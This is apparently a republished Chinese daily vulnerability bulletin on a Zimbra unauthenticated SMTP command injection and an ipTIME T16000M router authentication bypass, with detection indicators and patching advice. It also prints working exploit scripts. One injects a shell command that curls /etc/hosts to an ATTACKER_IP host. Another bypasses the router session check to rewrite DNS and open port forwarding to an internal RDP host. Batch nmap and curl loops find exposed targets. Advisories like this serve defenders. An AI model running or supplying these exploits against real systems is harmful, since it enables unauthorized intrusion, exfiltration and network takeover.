每日漏洞推送ZimbraCollaborationSuite未认证SMTP命令注入→任意命令执行

admin 2026-08-25 04:46:30 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 今日漏洞推送包含两个高危漏洞。CVE-2026-73570影响ZimbraCollaborationSuite,未认证SMTP命令注入可致任意命令执行,CISAKEV已收录且修复截止今日。CVE-2026-78167影响ipTIMET16000M路由器,会话校验缺陷可致未认证设备完全接管,CVSS10.0,厂商未响应。两者均需立即处置。 综合评分: 85 文章分类: 漏洞分析,应急响应,漏洞POC


每日漏洞推送 Zimbra Collaboration Suite 未认证SMTP命令注入 → 任意命令执行

原创

nullchen nullchen

富贵学安全

2026年8月24日 10:39 陕西

在小说阅读器读本章

去阅读

📡 每日漏洞情报推送 | 2026-08-24


🔴 漏洞一:CVE-2026-73570 — Zimbra Collaboration Suite 未认证SMTP命令注入 → 任意命令执行(KEV 修复截止今日!)

📋 漏洞档案

| 项目 | 内容 | | — | — | | CVE编号 | CVE-2026-73570 | | 影响产品 | Zimbra Collaboration Suite (ZCS) < 10.1.20(安装了可选 zimbra-snmp 包且启用 SNMP 通知时受影响) | | 漏洞类型 | OS 命令注入 (CWE-78) | | CVSS | 8.9 (HIGH) — CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L | | 公开时间 | 2026-08-13(NVD) / 2026-08-21(CISA KEV 收录) | | 在野利用 | ✅ 已确认在野利用 — CISA KEV 收录 | | KEV 修复截止 | 2026-08-24(今天!) — BOD 26-04 强制要求 |

🔥 紧急程度

CISA 已知被利用漏洞(KEV),修复截止日期就是今天(08-24)! 攻击者通过未认证的 SMTP 请求即可在 Zimbra 邮件服务器上以 zimbra 用户身份执行任意系统命令。Zimbra 是国内政企使用最广泛的邮件系统之一,请立即核查版本并打补丁,今天到期!

📝 漏洞描述

Zimbra Collaboration Suite(ZCS 10.1.20 之前版本)在安装了可选的 zimbra-snmp 包并启用 SNMP 通知时,处理 SNMP 通知的过程中对不可信输入未做有效过滤:攻击者无需认证,仅发送特制 SMTP 请求即可触发任意操作系统命令执行,且以 zimbra 系统用户身份运行。zimbra 用户对邮件存储与配置具有完全读写权限,可进一步窃取邮件数据、读取配置文件中的明文凭据、植入持久化后门或横向移动。

利用条件:无 — 无需任何认证,仅需目标 25/TCP(SMTP)端口可达。

💻 PoC/EXP

1️⃣ 未认证探测与版本指纹(Python)

#!/usr/bin/env python3
"""
CVE-2026-73570 Zimbra 命令注入 前置探测
注意:仅用于授权安全测试
"""
importsmtplib
importsocket
importsys

TARGET=sys.argv[1]&nbsp;iflen(sys.argv)&nbsp;>1else"mail.example.com"

print(f"[*] 探测&nbsp;{TARGET}:25 ...")
try:
&nbsp; &nbsp;&nbsp;withsmtplib.SMTP(TARGET,&nbsp;25,&nbsp;timeout=10)&nbsp;assmtp:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;banner=smtp.ehlo()
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print("[+] SMTP 可达,Banner:",&nbsp;smtp.ehlo_resporbanner)
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;# Zimbra 特征: 250-mta.example.com / 250-PIPELINING 等
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if"zimbra"instr(smtp.ehlo_resp).lower():
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;print("[!] 疑似 Zimbra 服务器,需进一步确认版本")
exceptExceptionase:
&nbsp; &nbsp;&nbsp;print("[-] 连接失败:",&nbsp;e)

2️⃣ SMTP 命令注入 PoC(利用框架)

#!/usr/bin/env python3
"""
CVE-2026-73570 未认证 SMTP 命令注入 PoC(利用框架)
原理:在 SMTP 信封参数中注入 shell 元字符,使后端拼接命令时执行注入指令
注意:仅用于授权安全测试;实际 payload 需按目标版本调整
"""
importsmtplib
importsocket
importsys
importtime

TARGET=sys.argv[1]&nbsp;iflen(sys.argv)&nbsp;>1else"mail.example.com"
# 注入命令(先做无害验证:写入 /tmp 标记文件)
CMD="id > /tmp/pwned_zimbra; curl http://ATTACKER_IP/x -d @/etc/hosts"

# 构造注入载荷:利用 SMTP 参数中的反引号/分号注入(不同版本注入点各异,
# 常见于 MAIL FROM / RCPT TO / 自定义 header 的本地投递参数)
INJECT=f'`{CMD}`'

s=socket.create_connection((TARGET,&nbsp;25),&nbsp;timeout=10)
s.recv(4096)

defsend(line:&nbsp;str):
&nbsp; &nbsp;&nbsp;s.sendall(line.encode()&nbsp;+b"\r\n")
&nbsp; &nbsp;&nbsp;time.sleep(0.3)
&nbsp; &nbsp;&nbsp;returns.recv(4096).decode(errors="ignore")

print(send(f"EHLO attacker.example.com"))
print(send(f"MAIL FROM:<{INJECT}@example.com>"))
print(send(f"RCPT TO:<[email protected]>"))
print(send("DATA"))
print(send("Subject: test"))
print(send("."))
print(send("QUIT"))
s.close()
print("[*] 验证:登录目标服务器检查 /tmp/pwned_zimbra 是否存在,"
&nbsp; &nbsp; &nbsp;&nbsp;"或监听 ATTACKER_IP 80 是否收到 /etc/hosts 回传")

3️⃣ 批量资产排查(nmap + 脚本)

# 1. 扫描邮件服务器
nmap&nbsp;-p25--open-sV-Pn-iL&nbsp;mail_assets.txt |&nbsp;grep-i&nbsp;zimbra

# 2. 对疑似目标执行探测脚本
for&nbsp;ip&nbsp;in$(cat zimbra_hosts.txt);&nbsp;do
&nbsp; python3 detect_zimbra.py&nbsp;"$ip"
done

🛡️ 检测与防御

日志检测IOC

  • Zimbra /opt/zimbra/log/mailbox.log/var/log/zimbra.log 中出现异常 SMTP 信封(含 `$();| 等 shell 元字符)
  • 邮件队列中出现 MAIL FROM/RCPT TO 含特殊字符的畸形邮件
  • 服务器出现异常进程(/tmp 下脚本、反弹 shell、curl/wget 外联)

修复建议

  1. 今天内:按 CISA KEV 要求(BOD 26-04)完成 Zimbra 补丁升级(参考厂商 Zimbra Security Advisory)
  2. 限制 SMTP 入口来源:仅允许可信 MTA/客户端 IP 访问 25/TCP
  3. 排查 zimbra 用户异常登录、/tmp 可疑文件、crontab 后门
  4. 轮换 Zimbra 管理口令及 LDAP 凭据,检查邮件数据完整性
  5. 无法立即升级时:用 WAF/防火墙在 SMTP 层拦截含 shell 元字符的信封参数

🔗 参考来源

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-73570
  • CISA KEV: https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-73570
  • CVE 记录: https://www.cve.org/CVERecord?id=CVE-2026-73570
  • CERT Polska 公告: https://moje.cert.pl/komunikaty/2026/145/aktywnie-wykorzystywana-podatnosc-w-zimbra-collaboration-suite/
  • Zimbra 安全公告: https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories

🔴 漏洞二:CVE-2026-78167 — ipTIME T16000M 会话校验缺陷 → 未认证设备完全接管(CVSS 10.0)

📋 漏洞档案

| 项目 | 内容 | | — | — | | CVE编号 | CVE-2026-78167 | | 影响产品 | EFM ipTIME T16000M 固件 14.20.2 | | 漏洞类型 | 关键函数缺失认证 (CWE-306) | | CVSS | 10.0 (CRITICAL) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H | | 发现者 | VulDB(公开披露) | | 公开时间 | 2026-08-24 | | 利用前提 | 无 — 未认证远程利用,EXP 已公开,厂商未响应 |

🔥 紧急程度

CVSS 10.0 满分。与 08-17 通报的 ipTIME A3004T(CVE-2026-19977)同源缺陷(httpcon_check_session_url 会话校验函数),本次影响企业级型号 T16000M。厂商对披露未做任何响应、无补丁。 ipTIME 为国内家用/小型企业路由器主流品牌,公网暴露面大,攻击者可篡改 DNS、开启端口转发、下发恶意配置,直接控制内网边界。

📝 漏洞描述

T16000M 固件 14.20.2 的会话校验处理器 httpcon_check_session_url 存在缺陷:任何未认证请求都能绕过会话校验访问受保护的管理接口。攻击者直接调用管理 CGI/接口即可读取系统状态、修改配置(DNS/路由/端口转发)、下发命令。由于会话校验是设备全部管理功能的前置关口,此缺陷等同于未认证设备完全接管

💻 PoC/EXP

1️⃣ 未认证探测(curl)

#!/bin/bash
# CVE-2026-78167 ipTIME T16000M 认证绕过探测
# 注意:仅用于授权安全测试
TARGET="${1:-http://192.168.0.1}"

echo"[*] 未认证访问会话校验端点..."
# 与 CVE-2026-19977 同源:通过 checkSession 传入受保护 URL 绕过
RESP=$(curl -sk -o /dev/null -w "%{http_code}" \
&nbsp; "$TARGET/sess/checkSession?url=/httpcon_check_session_url")

echo"[*] HTTP&nbsp;$RESP"
if&nbsp;[&nbsp;"$RESP"="200"&nbsp;];&nbsp;then
&nbsp;&nbsp;echo"[!] 会话校验绕过成功,继续探测管理接口..."
&nbsp;&nbsp;# 未认证直接读取系统状态
&nbsp;&nbsp;curl-sk"$TARGET/sess/checkSession?url=/status.html"
else
&nbsp;&nbsp;echo"[-] 目标可能已修复或非受影响版本(14.20.2)"
fi

2️⃣ 未认证管理接口访问(Python)

#!/usr/bin/env python3
"""
CVE-2026-78167 ipTIME T16000M 未认证接管 PoC
注意:仅用于授权安全测试
"""
importrequests
importsys

requests.packages.urllib3.disable_warnings()
TARGET=sys.argv[1].rstrip('/')&nbsp;iflen(sys.argv)&nbsp;>1else"http://192.168.0.1"

s=requests.Session()
s.verify=False

# 1. 绕过会话校验,进入管理面
r=s.get(f"{TARGET}/sess/checkSession?url=/httpcon_check_session_url",&nbsp;timeout=10)
print(f"[*] checkSession: HTTP&nbsp;{r.status_code}")

# 2. 未认证读取系统状态(WAN IP / 固件 / 运行时间)
r=s.get(f"{TARGET}/status.html",&nbsp;timeout=10)
if"wan"inr.text.lower()&nbsp;or"firmware"inr.text.lower():
&nbsp; &nbsp;&nbsp;print("[+] 已未认证获取设备状态,绕过生效!")

# 3. 恶意配置下发示例:篡改主 DNS(内网解析劫持)
payload=&nbsp;{"dns1":&nbsp;"8.8.8.8",&nbsp;"dns2":&nbsp;"1.1.1.1"}
r=s.post(f"{TARGET}/sess/checkSession?url=/apply_dns.cgi",&nbsp;data=payload,&nbsp;timeout=10)
print(f"[*] DNS 篡改请求: HTTP&nbsp;{r.status_code}")

# 4. 开启端口转发暴露内网主机(示例)
fw=&nbsp;{"proto":&nbsp;"tcp",&nbsp;"extport":&nbsp;"3389",&nbsp;"intip":&nbsp;"192.168.0.100",&nbsp;"intport":&nbsp;"3389"}
r=s.post(f"{TARGET}/sess/checkSession?url=/apply_portforward.cgi",&nbsp;data=fw,&nbsp;timeout=10)
print(f"[*] 端口转发请求: HTTP&nbsp;{r.status_code}")
print("[!] 验证:检查设备 WAN 侧 3389 是否可达内网主机 192.168.0.100")

3️⃣ 批量扫描

# 扫描公网/内网暴露的 ipTIME 管理端口(80/443/8080)
nmap&nbsp;-p80,443,8080&nbsp;--open-sV-Pn-iL&nbsp;targets.txt \
&nbsp; |&nbsp;grep-B1-i"ipTIME\|EFM"&nbsp;\
&nbsp; |&nbsp;awk'/Nmap scan report/{ip=$NF} /ipTIME/{print ip}'&nbsp;> iptime_hosts.txt

# 批量验证
for&nbsp;ip&nbsp;in$(cat iptime_hosts.txt);&nbsp;do
&nbsp;&nbsp;curl-sk-o&nbsp;/dev/null&nbsp;-w"$ip&nbsp;%{http_code}\n"&nbsp;\
&nbsp; &nbsp;&nbsp;"http://$ip/sess/checkSession?url=/httpcon_check_session_url"
done&nbsp;|&nbsp;grep" 200"

🛡️ 检测与防御

日志检测IOC

  • 设备访问日志出现大量 /sess/checkSession?url= 请求且无登录记录
  • 未认证会话直接访问 status.htmlapply_dns.cgiapply_portforward.cgi 等管理端点
  • 设备 DNS 配置被篡改(内网用户 DNS 解析异常)

修复建议

  1. 管理页面立即禁止公网暴露,关闭远程管理(ipTIME 默认 80/8080 外网可达需显式关闭)
  2. 在边界防火墙上仅允许内网管理网段访问设备管理端口
  3. 核查设备 DNS 是否被篡改、有无异常端口转发规则
  4. 关注厂商固件更新(披露时无补丁),升级前可临时用强口令 + IP 白名单缓解(注意:本漏洞为认证绕过,口令无法完全缓解,核心是收敛暴露面)
  5. 内网部署 DNS 审计,监控异常解析

🔗 参考来源

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-78167
  • VulDB: https://vuldb.com/cve/CVE-2026-78167
  • 关联漏洞 CVE-2026-19977(ipTIME A3004T 同源): https://nvd.nist.gov/vuln/detail/CVE-2026-19977

📌 今日速览(其他值得关注)

| CVE | 产品 | 类型 | CVSS | 说明 | | — | — | — | — | — | | CVE-2026-78154 | the-momentum open-wearables ≤0.6.2 | 邀请码兑换端点缺失认证 (CWE-306) | 7.3 HIGH | 未认证兑换邀请码,厂商未响应 | | CVE-2026-78166 | provectus kafka-ui ≤0.7.2 | Groovy 代码注入 (CWE-94) | 6.3 MEDIUM | executeSmartFilterTest 代码注入,EXP 公开 | | CVE-2026-78148 | llama.cpp ggml-RPC (bec4772f6) | 空指针解引用 (CWE-476) | 5.3 MEDIUM | 远程 DoS,修复 PR 待合并 |


⏰ 今日重点行动项

  1. Zimbra(CVE-2026-73570)— 今天到期! KEV 在野利用,未认证 SMTP RCE,立即打补丁
  2. ipTIME T16000M(CVE-2026-78167) — CVSS 10.0 未认证接管,立即收敛公网暴露面
  3. 上周 TrueConf 攻击链(72529+72530)修复截止 08-23 已过,请复核是否已修复

⚠️ 警告:提供的PoC/EXP仅限授权安全测试使用,未经授权的利用行为可能违反《刑法》第285条及相关法律法规。


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:富贵学安全 nullchen nullchen《每日漏洞推送 Zimbra Collaboration Suite 未认证SMTP命令注入 → 任意命令执行》

评论:0   参与:  0